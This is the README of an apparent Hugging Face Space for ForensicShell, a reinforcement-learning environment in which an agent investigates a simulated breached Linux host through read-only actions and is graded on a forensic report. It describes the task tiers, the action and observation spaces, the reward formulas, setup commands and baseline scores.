Spaces:
Sleeping
title: ForensicShell OpenEnv
emoji: π
colorFrom: red
colorTo: gray
sdk: docker
pinned: false
app_port: 8000
base_path: /web
tags:
- openenv
- forensics
- security
- rl
ForensicShell β OpenEnv Environment
A real-world digital forensics environment for the OpenEnv RL framework. The agent
investigates a pre-seeded "breached" Linux host using read-only structured actions
(list_dir, read_file, grep, stat) and submits a structured ForensicReport
that is graded deterministically against hidden ground truth.
Why this environment?
Most RL environments are toys (games, classification, echo). ForensicShell simulates something a junior SOC analyst actually does on day one: SSH into a compromised box, read the logs, find the modified files, hash the backdoor, and reconstruct the attacker's kill chain. It is not a game, the grader is fully deterministic, and partial credit is awarded per subfield so the reward function gives a real gradient instead of a 0/1 cliff.
Tasks
The environment exposes three difficulty tiers, selectable at reset(task_id=...).
task_id |
Difficulty | What the agent must determine |
|---|---|---|
t1_login |
Easy | Compromised user + initial source IP |
t2_modified |
Medium | + List of modified system files + SHA256 of the backdoor binary |
t3_timeline |
Hard | + Ordered attacker kill-chain timeline (login β recon β privesc β persistence β exfil) |
Each task ships with a different hand-authored scenario: different usernames, IPs, attacker tools, and attack patterns. Ground truth is held inside the env and never exposed to the agent through the action API.
Action space
A single discriminated action ForensicShellAction with action_type selecting the verb:
action_type |
Required fields | Effect |
|---|---|---|
list_dir |
path |
List immediate children of a directory in the synthetic FS |
read_file |
path, max_bytes |
Read the contents of a file (truncated to max_bytes) |
grep |
pattern, path |
Return matching lines with line numbers (max 100 hits) |
stat |
path |
Return size + SHA256 of the file's bytes |
submit_report |
report (ForensicReport) |
Terminal β grades the report and ends the episode |
The agent has 30 steps per episode. Failing to submit before the budget is exhausted ends the episode with reward 0.
Observation space
class ForensicShellObservation(Observation):
output: str # human-readable result of the last action
task_id: str # current task identifier
task_description: str # what the agent must determine
steps_remaining: int # remaining action budget
action_error: Optional[str] # error message if the last action failed, else None
done: bool
reward: float # 0.0 except on the terminal submit_report step
metadata: dict
Reward function
Rewards are returned only on the terminal submit_report step. The grader is
deterministic and awards partial credit per subfield, so the reward signal has
meaningful gradient:
| Task | Grader composition |
|---|---|
t1_login |
0.5 * user_correct + 0.5 * ip_correct |
t2_modified |
0.2*user + 0.2*ip + 0.3*Jaccard(modified_files) + 0.3*sha256_correct |
t3_timeline |
0.15*user + 0.15*ip + 0.15*files + 0.15*sha + 0.20*phase_F1 + 0.20*Kendall_tau_ordering |
All rewards clip to [0.0, 1.0]. See server/grader.py for the full implementation.
Quick start (client)
import asyncio
from forensic_shell import ForensicShellAction, ForensicShellEnv
from forensic_shell.models import ForensicReport, TimelineEvent
async def main():
async with ForensicShellEnv(base_url="https://YOUR-SPACE.hf.space") as env:
result = await env.reset(task_id="t1_login")
print(result.observation.task_description)
result = await env.step(ForensicShellAction(action_type="list_dir", path="/var/log"))
result = await env.step(ForensicShellAction(action_type="read_file", path="/var/log/auth.log"))
result = await env.step(ForensicShellAction(
action_type="submit_report",
report=ForensicReport(compromised_user="alice", initial_ip="198.51.100.77"),
))
print(f"reward={result.reward:.3f} done={result.done}")
asyncio.run(main())
Building locally
docker build -t forensic-shell:latest -f server/Dockerfile .
docker run -p 8000:8000 forensic-shell:latest
The server exposes:
POST /resetβ start a new episodePOST /stepβ execute an actionGET /stateβ episode stateGET /healthβ health checkGET /docsβ OpenAPI docsWS /wsβ persistent WebSocket session (used byEnvClient)
Running the baseline
The repo root contains inference.py which runs an OpenAI-client-compatible LLM
through all three tasks and emits hackathon-formatted [START]/[STEP]/[END] log
lines to stdout.
export HF_TOKEN=<your-key>
export API_BASE_URL=https://api.groq.com/openai/v1 # or HF Router
export MODEL_NAME=llama-3.3-70b-versatile
export LOCAL_IMAGE_NAME=forensic-shell:latest
python inference.py
A local baseline run (Llama-3.3-70B via Groq) scores roughly:
| Task | Score |
|---|---|
t1_login (easy) |
1.000 |
t2_modified (medium) |
0.500 |
t3_timeline (hard) |
0.750 |
Scores are non-trivial without being trivially solved β exactly what an RL training signal needs.
License
BSD-3-Clause (matches OpenEnv core).